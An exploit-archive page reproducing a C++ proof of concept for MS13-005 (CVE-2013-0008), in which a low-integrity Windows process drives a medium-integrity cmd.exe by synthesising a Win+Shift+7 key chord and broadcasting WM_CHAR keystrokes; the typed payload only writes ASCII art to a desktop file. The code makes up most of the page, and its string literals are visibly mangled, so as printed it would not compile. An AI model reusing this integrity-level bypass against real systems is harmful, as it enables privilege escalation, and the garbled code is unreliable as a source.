
# Title : MS13-005 HWND_BROADCAST PoC
# Published : 2013-02-11
# Author :
# Previous Title : IrfanView 4.33 IMXCF.DLL Plugin Code Execution
# Next Title : MySQL (Linux) Heap Based Overrun PoC Zeroday


/*
    ms13-005-funz-poc.cpp - Drive a Medium IL cmd.exe via a Low IL
process and message broadcasted
    Copyright (C) 2013 Axel "0vercl0k" Souchet - http://www.twitter.com/0vercl0k

    This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program.  If not, see <http://www.gnu.org/licenses/>.

    @taviso did all the work, I just followed his blogpost:
      -> http://blog.cmpxchg8b.com/2013/02/a-few-years-ago-while-working-on.html
-- amazing.

    Cool trick:
      -> If you want to set this process to a low IL you can use:
      icacls ms13-005-funz-poc.exe /setintegritylevel L
      -> The new ms13-005-funz-poc.exe will now be launched at low IL
(you can check it with Process Explorer)

    # Exploit Title: ms13-005-funz-poc.cpp
    # Date: 2013-02-05
    # Exploit Author: 0vercl0k - https://twitter.com/0vercl0k
    # Vendor Homepage: https://www.microsoft.com/
    # Version: Windows Vista, Windows Server 2008, Windows 7, Windows
Server 2008 r2, Windows 8, Windows Server 2012, Windows RT (See
http://technet.microsoft.com/fr-fr/security/bulletin/ms13-005)
    # Tested on: Windows 7
    # CVE : CVE-2013-0008 -
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0008
    # Video: http://0vercl0k.tuxfamily.org/bl0g/ms13-005-funz/ms13-005-funz-poc.mp4
*/

#include <windows.h>
#include <stdio.h>

/*
 * Entry point of the PoC. The flow, as visible below, is:
 *   1. CreateProcess() a cmd.exe from this (low IL) process;
 *   2. synthesize a Win+Shift+7 key chord with keybd_event();
 *   3. TerminateProcess() the cmd.exe spawned in step 1;
 *   4. deliver every byte of `payload` as a WM_CHAR through
 *      SendMessage(HWND_BROADCAST, ...), one WM_CHAR per character,
 *      followed by a VK_RETURN after each line.
 *
 * The whole demonstration depends on WM_CHAR messages broadcast with
 * HWND_BROADCAST being accepted by a window owned by a higher-IL process;
 * that is the behaviour the MS13-005 / CVE-2013-0008 bulletin named in the
 * file header addresses. Nothing in this function checks that a recipient
 * window actually exists, so the result is entirely timing- and
 * environment-dependent (see the fixed Sleep() calls below).
 *
 * Returns EXIT_SUCCESS unconditionally; no API return value is checked.
 */
int main()
{
    STARTUPINFO si = {0};
    /* Zero-initialized, so if CreateProcess() below fails, pi.hProcess stays
     * NULL and is still handed to TerminateProcess() further down. */
    PROCESS_INFORMATION pi = {0};
    /* NUL-terminated table of command lines typed into the target console.
     * NOTE(review): these literals look extraction-mangled — embedded quotes
     * appear unescaped, single backslashes precede letters (invalid escapes),
     * and several entries are split across physical lines. Confirm against
     * the original source before trusting them; as printed they do not
     * compile. Also, string literals are not writable, so `const char *`
     * would be the accurate element type rather than PCHAR. */
    PCHAR payload[] = {
        "echo ".___   _____    ______________ ______________   ">
%USERPROFILE%\Desktop\TROLOLOL",
        "echo "|   | /     \   \__    ___/   |   \_   _____/
">> %USERPROFILE%\Desktop\TROLOLOL",
        "echo "|   |/  \ /  \    |    | /    ~    \    __)_
">> %USERPROFILE%\Desktop\TROLOLOL",
        "echo "|   /    Y    \   |    | \    Y    /        \
">> %USERPROFILE%\Desktop\TROLOLOL",
        "echo "|___\____|__  /   |____|  \___|_  /_______  /   ">>
%USERPROFILE%\Desktop\TROLOLOL",
        "echo "           \/                  \/        \/
">> %USERPROFILE%\Desktop\TROLOLOL",
        "echo " _______  .___  ________  ________    _____     ">>
%USERPROFILE%\Desktop\TROLOLOL",
        "echo " \      \ |   |/  _____/ /  _____/   /  _  \
">> %USERPROFILE%\Desktop\TROLOLOL",
        "echo " /   |   \|   /   \  ___/   \  ___  /  /_\  \
">> %USERPROFILE%\Desktop\TROLOLOL",
        "echo "/    |    \   \    \_\  \    \_\  \/    |
\  ">> %USERPROFILE%\Desktop\TROLOLOL",
        "echo "\____|__  /___|\______  /\______  /\____|__  /
">> %USERPROFILE%\Desktop\TROLOLOL",
        "echo "       \/            \/        \/         \/
">> %USERPROFILE%\Desktop\TROLOLOL",
        "exit",
        NULL
    };

    /* NOTE(review): the trailing "n" here and in the later printf() calls
     * was presumably "\n" before the backslash was lost — confirm. */
    printf("1] Spawning a low IL cmd.exe (from a low IL process)..Rdy
? Press to continuen");
    getchar();

    /* STARTUPINFO.cb must be set before the call; everything else stays
     * zeroed. The return value (BOOL) is ignored, so a failed spawn is not
     * detected and pi is left zeroed. bInheritHandles is TRUE although no
     * inheritable handle is set up here. */
    si.cb = sizeof(si);
    CreateProcess(
        NULL,
        "cmd.exe",
        NULL,
        NULL,
        TRUE,
        CREATE_NEW_CONSOLE,
        NULL,
        NULL,
        &si,
        &pi
    );

    /* Fixed 1 s delay for the new console to appear — a race, not a
     * synchronisation; there is no wait on a window or process event. */
    Sleep(1000);

    // Yeah, you can "bruteforce" the index of the window..
    /* Press, then release, the three keys of the Win+Shift+7 chord. The
     * second argument of keybd_event() is the hardware scan code, the third
     * the flags (0 = key down, KEYEVENTF_KEYUP = key up). */
    printf("2] Use Win+Shift+7 to ask explorer.exe to spawn a cmd.exe MI..");
    keybd_event(VK_LWIN, 0x5B, 0, 0);
    keybd_event(VK_LSHIFT, 0xAA, 0, 0);
    keybd_event(0x37, 0x87, 0, 0);

    keybd_event(VK_LWIN, 0x5B, KEYEVENTF_KEYUP, 0);
    keybd_event(VK_LSHIFT, 0xAA, KEYEVENTF_KEYUP, 0);
    keybd_event(0x37, 0x87, KEYEVENTF_KEYUP, 0);

    /* Same unsynchronised delay as above, this time for the chord to be
     * processed. */
    Sleep(1000);
    printf("3] Killing now the useless low IL cmd.exe..n");

    /* 1337 is an arbitrary exit code handed to the terminated process. If
     * CreateProcess() failed, pi.hProcess is NULL here. pi.hProcess and
     * pi.hThread are never passed to CloseHandle(), so both handles leak
     * until this process exits. */
    TerminateProcess(
        pi.hProcess,
        1337
    );

    printf("4] Now driving the medium IL cmd.exe with SendMessage and
HWND_BROADCAST (WM_CHAR)n");
    printf("   "Drive the command prompt [..] to make it look like a
scene from a Hollywood movie." <- That's what we're going to do!n");

    /* Outer loop walks the NULL-terminated payload table; inner loop sends
     * one WM_CHAR per byte. strlen() is re-evaluated on every inner
     * iteration (loop-invariant work that could be hoisted). SendMessage()
     * with HWND_BROADCAST delivers to every top-level window and blocks
     * until each has processed the message; its return value is ignored.
     * strlen() is used without an explicit <string.h> include — it is
     * presumably pulled in transitively by <windows.h>. */
    for(unsigned int i = 0; payload[i] != NULL; ++i)
    {
        for(unsigned int j = 0; j < strlen(payload[i]); ++j)
        {
            // Yeah, that's the fun part to watch ;D
            /* 10 ms pacing between characters, purely cosmetic. The byte is
             * passed as the WPARAM character code of WM_CHAR. */
            Sleep(10);
            SendMessage(
                HWND_BROADCAST,
                WM_CHAR,
                payload[i][j],
                0
            );
        }

        /* VK_RETURN is sent as a WM_CHAR character code (not as a key-down
         * event) to end the current line. */
        SendMessage(
            HWND_BROADCAST,
            WM_CHAR,
            VK_RETURN,
            0
        );
    }

    /* EXIT_SUCCESS comes from <stdlib.h>, which is not included explicitly
     * here; <windows.h> is presumably providing it. */
    return EXIT_SUCCESS;
}